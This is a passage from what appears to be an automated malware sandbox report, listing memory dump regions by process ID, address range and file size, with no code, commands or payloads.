                                        • memory/848-131-0x0000000000000000-mapping.dmp
                                        • memory/852-128-0x0000000000000000-mapping.dmp
                                        • memory/856-85-0x0000000000000000-mapping.dmp
                                        • memory/856-133-0x0000000000000000-mapping.dmp
                                        • memory/868-109-0x0000000000000000-mapping.dmp
                                        • memory/912-54-0x0000000074DB1000-0x0000000074DB3000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/912-59-0x0000000003CA0000-0x0000000004964000-memory.dmp
                                          Filesize

                                          12.8MB

                                        • memory/980-121-0x0000000000000000-mapping.dmp
                                        • memory/992-111-0x0000000000000000-mapping.dmp
                                        • memory/1012-112-0x0000000000000000-mapping.dmp
                                        • memory/1016-74-0x000007FEED150000-0x000007FEEDCAD000-memory.dmp
                                          Filesize

                                          11.4MB

                                        • memory/1016-75-0x0000000002894000-0x0000000002897000-memory.dmp
                                          Filesize

                                          12KB

                                        • memory/1016-76-0x000000001B6F0000-0x000000001B9EF000-memory.dmp
                                          Filesize

                                          3.0MB

                                        • memory/1016-71-0x0000000000000000-mapping.dmp
                                        • memory/1016-77-0x0000000002894000-0x0000000002897000-memory.dmp
                                          Filesize

                                          12KB

                                        • memory/1016-78-0x000000000289B000-0x00000000028BA000-memory.dmp
                                          Filesize

                                          124KB

                                        • memory/1060-132-0x0000000000000000-mapping.dmp
                                        • memory/1112-108-0x0000000000000000-mapping.dmp
                                        • memory/1216-82-0x0000000000000000-mapping.dmp
                                        • memory/1216-107-0x0000000000000000-mapping.dmp
                                        • memory/1228-127-0x0000000000000000-mapping.dmp
                                        • memory/1232-70-0x000007FEFB6E1000-0x000007FEFB6E3000-memory.dmp
                                          Filesize

                                          8KB

                                        • memory/1232-69-0x000000001B9E0000-0x000000001BDFE000-memory.dmp
                                          Filesize

                                          4.1MB

                                        • memory/1232-67-0x0000000000230000-0x000000000064E000-memory.dmp
                                          Filesize

                                          4.1MB

                                        • memory/1256-117-0x0000000000000000-mapping.dmp
                                        • memory/1256-89-0x0000000000000000-mapping.dmp
                                        • memory/1260-136-0x0000000000000000-mapping.dmp
                                        • memory/1260-84-0x0000000000000000-mapping.dmp
                                        • memory/1348-118-0x0000000000000000-mapping.dmp
                                        • memory/1352-120-0x0000000000000000-mapping.dmp
                                        • memory/1420-124-0x0000000000000000-mapping.dmp
                                        • memory/1420-142-0x0000000000060000-0x0000000000067000-memory.dmp
                                          Filesize

                                          28KB

                                        • memory/1420-143-0x0000000000860000-0x0000000000866000-memory.dmp
                                          Filesize

                                          24KB

                                        • memory/1420-138-0x0000000000060000-0x0000000000067000-memory.dmp
                                          Filesize

                                          28KB

                                        • memory/1420-140-0x0000000000000000-mapping.dmp
                                        • memory/1516-97-0x0000000000400000-0x00000000010C4000-memory.dmp
                                          Filesize

                                          12.8MB

                                        • memory/1516-91-0x0000000000000000-mapping.dmp
                                        • memory/1516-95-0x0000000000400000-0x00000000010C4000-memory.dmp
                                          Filesize

                                          12.8MB

                                        • memory/1516-96-0x0000000076CC0000-0x0000000076E69000-memory.dmp
                                          Filesize

                                          1.7MB

                                        • memory/1516-98-0x0000000076CC0000-0x0000000076E69000-memory.dmp
                                          Filesize

                                          1.7MB

                                        • memory/1584-79-0x0000000000000000-mapping.dmp
                                        • memory/1636-126-0x0000000000000000-mapping.dmp
                                        • memory/1640-155-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-170-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-134-0x0000000000000000-mapping.dmp
                                        • memory/1640-158-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-146-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-168-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-167-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-165-0x000000014036EAC4-mapping.dmp
                                        • memory/1640-164-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-162-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-161-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-160-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-148-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-145-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-169-0x0000000000170000-0x0000000000190000-memory.dmp
                                          Filesize

                                          128KB

                                        • memory/1640-156-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-152-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-81-0x0000000000000000-mapping.dmp
                                        • memory/1640-150-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1640-154-0x0000000140000000-0x0000000140809000-memory.dmp
                                          Filesize

                                          8.0MB

                                        • memory/1652-65-0x0000000076CC0000-0x0000000076E69000-memory.dmp
                                          Filesize

                                          1.7MB

                                        • memory/1652-64-0x0000000000400000-0x00000000010C4000-memory.dmp
                                          Filesize

                                          12.8MB

                                        • memory/1652-56-0x0000000000000000-mapping.dmp
                                        • memory/1652-68-0x0000000000400000-0x00000000010C4000-memory.dmp
                                          Filesize

                                          12.8MB

                                        • memory/1680-83-0x0000000000000000-mapping.dmp
                                        • memory/1688-125-0x0000000000000000-mapping.dmp
                                        • memory/1728-87-0x0000000000000000-mapping.dmp
                                        • memory/1772-60-0x0000000000000000-mapping.dmp
                                        • memory/1832-114-0x0000000000000000-mapping.dmp
                                        • memory/1876-104-0x0000000001174000-0x0000000001177000-memory.dmp
                                          Filesize

                                          12KB

                                        • memory/1876-106-0x000000000117B000-0x000000000119A000-memory.dmp
                                          Filesize

                                          124KB

                                        • memory/1876-100-0x0000000000000000-mapping.dmp
                                        • memory/1876-102-0x000007FEEC8E0000-0x000007FEED303000-memory.dmp
                                          Filesize

                                          10.1MB

                                        • memory/1876-103-0x000007FEEBD80000-0x000007FEEC8DD000-memory.dmp
                                          Filesize

                                          11.4MB

                                        • memory/1876-105-0x000000000117B000-0x000000000119A000-memory.dmp
                                          Filesize

                                          124KB

                                        • memory/1944-129-0x0000000000000000-mapping.dmp
                                        • memory/1952-122-0x0000000000000000-mapping.dmp
                                        • memory/1956-88-0x0000000000000000-mapping.dmp
                                        • memory/1964-130-0x0000000000000000-mapping.dmp
                                        • memory/1972-94-0x0000000001230000-0x0000000001EF4000-memory.dmp
                                          Filesize

                                          12.8MB

                                        • memory/1972-141-0x0000000001230000-0x0000000001EF4000-memory.dmp
                                          Filesize

                                          12.8MB

                                        • memory/1988-119-0x0000000000000000-mapping.dmp
                                        • memory/2016-80-0x0000000000000000-mapping.dmp